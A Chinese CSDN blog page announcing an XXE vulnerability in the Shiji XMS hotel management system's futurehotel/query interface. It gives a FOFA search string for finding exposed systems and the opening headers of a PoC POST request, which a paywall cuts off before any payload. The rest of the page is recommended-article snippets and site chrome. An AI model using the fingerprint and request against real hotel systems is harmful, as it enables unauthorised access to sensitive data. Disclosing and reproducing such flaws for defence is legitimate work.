西软云XMS-futurehotel-query接口存在XXE漏洞

最新推荐文章于 2024-07-29 22:18:31 发布
最新推荐文章于 2024-07-29 22:18:31 发布
阅读量242 收藏
点赞数 3
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36334672/article/details/136449713
版权
本文详细介绍了西软云XMS-futurehotel-query接口存在的XXE漏洞,包括漏洞介绍、编号、影响范围、检索特征以及POC验证。建议受影响的用户更新到最新版本以修复该安全问题。
摘要由CSDN通过智能技术生成

西软云XMS-futurehotel-query接口存在XXE漏洞复现

1.漏洞介绍

西软云XMS-futurehotel-query接口存在XXE漏洞

2.漏洞编号
CVE CNVD CNNVD
- - -

3.影响范围
名称 版本号
-

4.检索特征

FOFA:app=“shiji-西软云XMS”
在这里插入图片描述

5.POC
POST /XopServerRS/rest/futurehotel/query HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.3157.54 Safari/537.36
Connection: close
Content-Type: text/xml
Accept-Encodin
最低0.47元/天 解锁文章
qq_36334672
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
西XMS futurehotel/query XXE漏洞复现
0xSec
02-29 636
西XMS/XopServerRS/rest/futurehotel/query接口存在XML实体注入漏洞,未经身份认证的攻击者可利用此漏洞获取服务器内部敏感数据,使系统处于极不安全状态。
漏洞复现】西XMS-operate-XXE
知黑而守白
03-01 118
西XMS是基于平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。西XMS operate 接口存在一处XML外部实体(XXE漏洞。攻击者通过精心构造的XML文件可能导致系统解析敏感信息,从而获取敏感数据或执行潜在的攻击。
漏洞复现】西XMS反序列化漏洞
weixin_45530380的博客
01-03 997
【代码】【漏洞复现】西XMS反序列化漏洞
漏洞复现】西XMS-query-XXE
知黑而守白
03-01 109
西XMS是基于平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代架构为国内四,五星级中高端酒店提供灵活、高度整合酒店业务,助力酒店智能转型升级。西XMS query 接口存在一处XML外部实体(XXE漏洞。攻击者通过精心构造的XML文件可能导致系统解析敏感信息,从而获取敏感数据或执行潜在的攻击。
西XMS-futurehotel-operate 接口存在XXE漏洞
qq_36334672的博客
03-08 251
西XMS-futurehotel-query接口存在XXE漏洞
XMS3.3.0餐饮操作说明书.pdf
05-27
西餐饮操作手册
Git-2.16.2-64-bit.exe下载
03-14
Git是世界上最流行的分布式版本控制系统,尤其在件开发领域被广泛使用。Git-2.16.2-64-bit.exe是适用于Windows操作系统的64位Git安装程序,它提供了在Windows环境下使用Git所需的所有组件。这个版本发布于2018年3...
Photoshop-CS数码照片处理技术解析电子教案7(共8张PPT).pptx
11-14
在婚纱照的创意设计中,教程特别展示了如何通过绘制路径创造浪漫的烟效果,这种方法可以增加照片的梦幻感,使整个画面仿佛置身于仙境之中。无论是想要复古、浪漫还是现代风格的婚纱照,都可以通过Photoshop CS实现...
烟-12型4层与常规3层密集烤房的性能对比 (2014年)
05-16
南省昆明、玉溪、曲靖、红河、楚雄、大理、昭通、保山、文山、丽江、普洱和临沧12个主产烟区的烟-12型4层密集烤房与常规3层密集烤房的烤烟效果进行了对比研究。结果表明:烟-12型4层密集烤房烤能为1.20~1.67...
5组-可行性分析报告-初版1
08-08
【可行性分析报告初版1】主要探讨了"落笔烟"项目,这是一个结合深度学习技术与手机APP的创新解决方案,旨在改善书法练习者的体验,尤其是对于非专业但希望提升书写美观度的用户群体。该项目利用了深度学习的图像...
网络安全之初始访问阶段攻防手段(三)
子非渔
07-25 1014
初始访问阶段攻防手段(SEIM、NDR、EDR、XDR、SOC、态势感知、僵木蠕、DNS、NETFLOW、DDOS、WAF、防火墙、日志审计)以及使用场景。
非科班出身的你,如何转行web安全工程师?零基础入门到精通,收藏这一篇就够了
Python_paipai的博客
07-29 228
因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。那么,转行web安全工程师,你需要掌握哪些技能呢?对web安全工程师很感兴趣。对现在的工作没有热情。
网安零基础入门神书,全面介绍Web渗透核心攻击与防御方式!
最新发布
互联网架构小马的博客
07-29 548
Web安全是指Web服务程序的漏洞,通常涵盖Web漏洞、操作系统洞、数据库漏洞、中间件漏洞等。“渗透测试”作为主动防御的一种关键手段,对评估网络系统安全防护及措施至关重要,因为只有发现问题才能及时终止并预防潜在的安全风险。根据网络安全调查统计,75%的网络攻击行为都是来自Web应用层面而非网络层面所以,学习Web安全的重要性不言而喻。Web安全吸引越来越多的人学习,有人是被其炫酷感染,有人是出于对技术的热爱,但大多数人还是为了高薪资和职场发展。
【WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 643
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
【WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 471
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1137
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 774
近日,一场由微视窗系统件更新引发的全球性“微蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
学习网络安全 为什么Linux首择Kali Linux? 以及如何正确的使用Kali Linux
一名初中生
07-25 619
什么是Kali Linux?
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值